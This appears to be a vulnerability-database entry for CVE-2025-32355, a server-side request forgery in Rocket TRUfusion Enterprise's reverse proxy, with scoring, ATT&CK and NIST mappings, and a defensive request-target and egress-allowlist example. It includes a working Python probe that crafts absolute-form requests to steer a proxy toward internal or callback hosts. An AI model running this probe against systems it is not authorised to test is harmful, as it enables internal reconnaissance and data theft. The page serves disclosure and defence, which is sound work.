Cyber Resilience

CVE-2025-32355

Severity: High · Public PoC available

Published: 17 February 2026

Modified: 03 April 2026
CVSS v4.0 score: 7.9 (High)
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X (the trailing X values mean the threat, environmental and supplemental metrics are not defined, so 7.9 is the base score)
EPSS score: 0.0199 (84.0th percentile)
Risk Priority: 17 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-32355 is a high-severity server-side request forgery (SSRF, CWE-918) vulnerability in Rocket TRUfusion Enterprise (listed here under the vendor/product pair Rocketsoftware Trufusion Enterprise). Its CVSS v4.0 base score is 7.9 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The vulnerability ranks in the top 16.0% of CVEs by EPSS exploit likelihood, is not currently listed in the CISA KEV catalog, and has a public proof-of-concept referenced.

The strongest mitigations our analysis identified are NIST 800-53 SC-7 (Boundary Protection) and SI-10 (Information Input Validation), alongside upgrading to a fixed release.

Deeper analysis

Rocket TRUfusion Enterprise through version 7.10.4.0 contains a server-side request forgery vulnerability (CWE-918) stemming from a misconfigured reverse proxy. The proxy accepts absolute-form request-targets (a full URL such as http://host/path in the HTTP request line, where a request to a reverse proxy normally carries only a path) and fetches the resource named in that URL instead of forwarding the request only to its configured backend.

An unauthenticated remote attacker can supply arbitrary URLs in the request line to make the affected server retrieve resources on their behalf. The CVSS 7.9 vector records no confidentiality or availability impact and only a low integrity impact on the vulnerable system itself (VC:N/VI:L/VA:N), but high impact on the confidentiality, integrity, and availability of subsequent systems reachable from the proxy (SC:H/SI:H/SA:H): internal network reconnaissance, data exfiltration from services that trust the proxy's source address, and abuse of internal HTTP endpoints that were never meant to be reachable from the Internet.
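The probe a tester sends to check for this class of misconfiguration, as an added example that is not part of the original page or of the referenced RCE Security and Rocket Software advisories. It assumes a proxy under test named app.example.test, an internal resource at http://10.0.0.5:8080/status that the proxy should never fetch for a client, and a tester-controlled listener identified by the token; all three are constructed placeholders, and the network function is only for systems you are authorised to test.

```python
"""Absolute-form request-line probe for a reverse proxy (added example).

Not code from Rocket Software or from the RCE Security advisory.
Host names, ports and the token are constructed placeholders.
"""
import socket
import ssl
from typing import Optional, Tuple
from urllib.parse import urlencode, urlsplit, urlunsplit

USER_AGENT = "absolute-form-probe/0.1"  # constructed


def build_absolute_form_probe(target_host: str, fetch_url: str, token: str,
                              host_header: Optional[str] = None) -> bytes:
    """Build a raw HTTP/1.1 request whose request-target is in absolute-form
    (RFC 9112 section 3.2.2). urllib and requests always emit origin-form
    ('GET /path'), so the request is assembled by hand and sent over a plain
    socket. A proxy that honours the authority in the request line instead of
    its configured backend will fetch `fetch_url`; `token` is appended as a
    query parameter so a hit on a tester-controlled listener can be tied back
    to this probe.
    """
    parts = urlsplit(fetch_url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("fetch_url must be an absolute http(s) URL")
    query = parts.query + ("&" if parts.query else "") + urlencode({"probe": token})
    target = urlunsplit((parts.scheme, parts.netloc, parts.path or "/", query, ""))
    # Host stays the public name so the front end still routes the request
    # into the vulnerable vhost; a second variant with host_header=parts.netloc
    # is worth sending, since some proxies key on Host rather than the target.
    lines = [
        f"GET {target} HTTP/1.1",
        f"Host: {host_header or target_host}",
        f"User-Agent: {USER_AGENT}",
        "Connection: close",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def build_control_request(target_host: str) -> bytes:
    """Ordinary origin-form request used as the baseline for comparison."""
    lines = ["GET / HTTP/1.1", f"Host: {target_host}",
             f"User-Agent: {USER_AGENT}", "Connection: close"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def send_raw(host: str, port: int, payload: bytes, use_tls: bool = False,
             timeout: float = 5.0) -> bytes:
    """Send `payload` byte-for-byte and return the raw response (network access)."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(payload)
        chunks = []
        while True:  # 'Connection: close' makes the server end the stream
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_status(response: bytes) -> Tuple[str, int, str]:
    """Return (http-version, status-code, reason-phrase) from a raw response."""
    status_line = response.split(b"\r\n", 1)[0].decode("latin-1")
    fields = status_line.split(" ", 2)
    if len(fields) < 2 or not fields[1].isdigit():
        raise ValueError(f"not an HTTP status line: {status_line!r}")
    return fields[0], int(fields[1]), fields[2] if len(fields) == 3 else ""


def assess(control_status: int, probe_status: int, callback_seen: bool) -> str:
    """Triage one probe. A hit on the tester-controlled listener is conclusive;
    a gateway error that the control request did not produce shows the proxy
    tried to connect to the supplied authority."""
    if callback_seen:
        return "confirmed: proxy fetched the attacker-supplied URL"
    if probe_status in (502, 504) and control_status not in (502, 504):
        return "probable: proxy attempted an outbound connection to the supplied authority"
    if probe_status == control_status:
        return "no signal: proxy ignored or normalised the absolute-form target"
    return "inconclusive: responses differ, confirm with a callback host"


if __name__ == "__main__":
    probe = build_absolute_form_probe("app.example.test",
                                      "http://10.0.0.5:8080/status", "t0k3n")
    print(probe.decode("ascii"))
    # Against a live, authorised target:
    # ctl = parse_status(send_raw("app.example.test", 443, build_control_request("app.example.test"), use_tls=True))[1]
    # prb = parse_status(send_raw("app.example.test", 443, probe, use_tls=True))[1]
    # print(assess(ctl, prb, callback_seen=False))
```

The differential status check is a weak signal on its own; the conclusive test is to point the absolute-form target at a host you control and watch for the DNS lookup or HTTP request carrying the token. Also send the variant that moves the internal authority into the Host header, since which part of the request a misconfigured proxy trusts varies by product.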

The EPSS score rose from a low baseline to a peak of 0.0522 on 2026-03-24 before receding to the current value of 0.0199, indicating a temporary increase in exploitation interest after disclosure. Public advisories are available from RCESecurity and Rocket Software at the referenced URLs.


Vulnerability details

Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.

CWE(s): CWE-918 Server-Side Request Forgery (SSRF)

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-assisted mapping)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

An SSRF in a public-facing reverse proxy is triggered by sending crafted requests to an Internet-facing service, which is exactly the initial-access path T1190 describes.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-27224 · same product: Rocketsoftware Trufusion Enterprise
CVE-2025-59793 · same product: Rocketsoftware Trufusion Enterprise
CVE-2025-27222 · same product: Rocketsoftware Trufusion Enterprise
CVE-2026-6514 · shared CWE-918
CVE-2026-44116 · shared CWE-918
CVE-2026-21887 · shared CWE-918
CVE-2026-31910 · shared CWE-918
CVE-2026-48153 · shared CWE-918
CVE-2026-45298 · shared CWE-918
CVE-2026-39362 · shared CWE-918

Affected Assets

rocketsoftware / trufusion enterprise · ≤ 7.10.5.0

Note the discrepancy: the asset range above ends at 7.10.5.0 while the vulnerability description says "through 7.10.4.0". Confirm the first fixed release against the Rocket Software advisory before closing a finding on version alone.

Mitigating Controls (NIST 800-53 r5, AI-assisted mapping)

prevent · Flaw remediation (patching)
Remediates the SSRF in the Rocket TRUfusion Enterprise reverse proxy by identifying, reporting, and applying the vendor fix: upgrade to a release later than 7.10.4.0, as identified in the Rocket Software advisory.

prevent · SI-10 Information Input Validation
Validates the HTTP request line at the reverse proxy, rejecting absolute-form request-targets (or rewriting to origin-form only when the authority is the proxy's own name) so the proxy can never be steered to an attacker-specified resource.

prevent · SC-7 Boundary Protection
Enforces boundary protection at the reverse proxy by allowlisting and monitoring its outbound connections, so that even a request-line parsing flaw cannot produce a fetch to anything other than the configured backend.
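What a hardened reverse-proxy front end does with the request line (SI-10) and with its outbound connections (SC-7), written as an added example for the two controls above; it is not Rocket Software's code and not the vendor patch for TRUfusion. The proxy's own public name (app.example.test), the configured backend (app-backend.internal:8080) and the fake resolver are constructed placeholders.

```python
"""Request-target normalisation and egress allowlisting for a reverse proxy.

Added example for the SI-10 and SC-7 controls; not Rocket Software's code.
OWN_HOSTS, EGRESS_ALLOWLIST and FAKE_RESOLVER are constructed placeholders.
"""
import socket
from typing import Callable, Dict, FrozenSet, List, Tuple
from urllib.parse import urlsplit

# Names under which this proxy is reachable from the Internet (constructed).
OWN_HOSTS: FrozenSet[str] = frozenset({"app.example.test"})
# The only upstreams the proxy may ever open a connection to (constructed).
EGRESS_ALLOWLIST: Dict[str, FrozenSet[int]] = {"app-backend.internal": frozenset({8080})}
BACKEND: Tuple[str, int] = ("app-backend.internal", 8080)


class RequestRejected(Exception):
    """Raised for request-targets or upstreams the proxy must not use."""


def normalize_request_target(method: str, target: str,
                             own_hosts: FrozenSet[str] = OWN_HOSTS) -> str:
    """SI-10: return an origin-form target ('/path?query') or raise.

    RFC 9112 section 3.2 defines four request-target forms. A reverse proxy
    needs only origin-form. Absolute-form is accepted solely when its
    authority is one of the proxy's own names (servers must accept that case)
    and is rewritten to origin-form, so the configured backend is used no
    matter what authority the client wrote into the request line.
    """
    if method == "CONNECT":
        raise RequestRejected("authority-form (CONNECT) is a forward-proxy feature")
    if target == "*":
        if method == "OPTIONS":
            return target
        raise RequestRejected("asterisk-form is only valid for OPTIONS")
    if target.startswith("/"):
        if target.startswith("//"):  # backends may read this as scheme-relative
            raise RequestRejected("scheme-relative path rejected")
        return target  # plain origin-form
    try:
        parts = urlsplit(target)
    except ValueError as exc:
        raise RequestRejected(f"unparseable request-target: {exc}") from exc
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        raise RequestRejected(f"unsupported request-target {target!r}")
    if parts.username is not None or parts.password is not None:
        raise RequestRejected("userinfo in request-target")
    if parts.hostname.lower() not in own_hosts:
        raise RequestRejected(f"absolute-form target for foreign authority {parts.netloc!r}")
    path = parts.path or "/"
    return path + (f"?{parts.query}" if parts.query else "")


def default_resolver(host: str) -> List[str]:
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def select_upstream(host: str, port: int,
                    allowlist: Dict[str, FrozenSet[int]] = EGRESS_ALLOWLIST,
                    resolver: Callable[[str], List[str]] = default_resolver) -> Tuple[str, int]:
    """SC-7: return the (ip, port) to connect to, or raise RequestRejected.

    The allowlist is keyed by name, but the name is resolved once and the
    connection is made to that address, so a later change in the DNS answer
    (rebinding) cannot move the proxy off the allowlisted upstream.
    """
    ports = allowlist.get(host.lower())
    if ports is None or port not in ports:
        raise RequestRejected(f"{host}:{port} is not an allowlisted upstream")
    addresses = resolver(host)
    if not addresses:
        raise RequestRejected(f"{host} did not resolve")
    return addresses[0], port


def plan_forward(method: str, target: str,
                 resolver: Callable[[str], List[str]] = default_resolver
                 ) -> Tuple[Tuple[str, int], str]:
    """Both checks together: where to connect and which origin-form target to send."""
    origin_target = normalize_request_target(method, target)
    return select_upstream(BACKEND[0], BACKEND[1], resolver=resolver), origin_target


def is_rejected(method: str, target: str) -> bool:
    try:
        normalize_request_target(method, target)
    except RequestRejected:
        return True
    return False


def FAKE_RESOLVER(host: str) -> List[str]:  # constructed, offline stand-in for DNS
    return {"app-backend.internal": ["10.0.0.5"]}.get(host, [])


if __name__ == "__main__":
    for method, target in [("GET", "/login"), ("GET", "http://app.example.test/login?x=1"),
                           ("GET", "http://10.0.0.9:8500/v1/kv/"), ("CONNECT", "10.0.0.9:22")]:
        try:
            print(method, target, "->", plan_forward(method, target, FAKE_RESOLVER))
        except RequestRejected as exc:
            print(method, target, "-> rejected:", exc)
```

Pair the code-level allowlist with a host firewall rule that lets the proxy's service account reach only the backend address and port; the application check stops the misconfiguration, the network rule limits the blast radius of the next one.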

References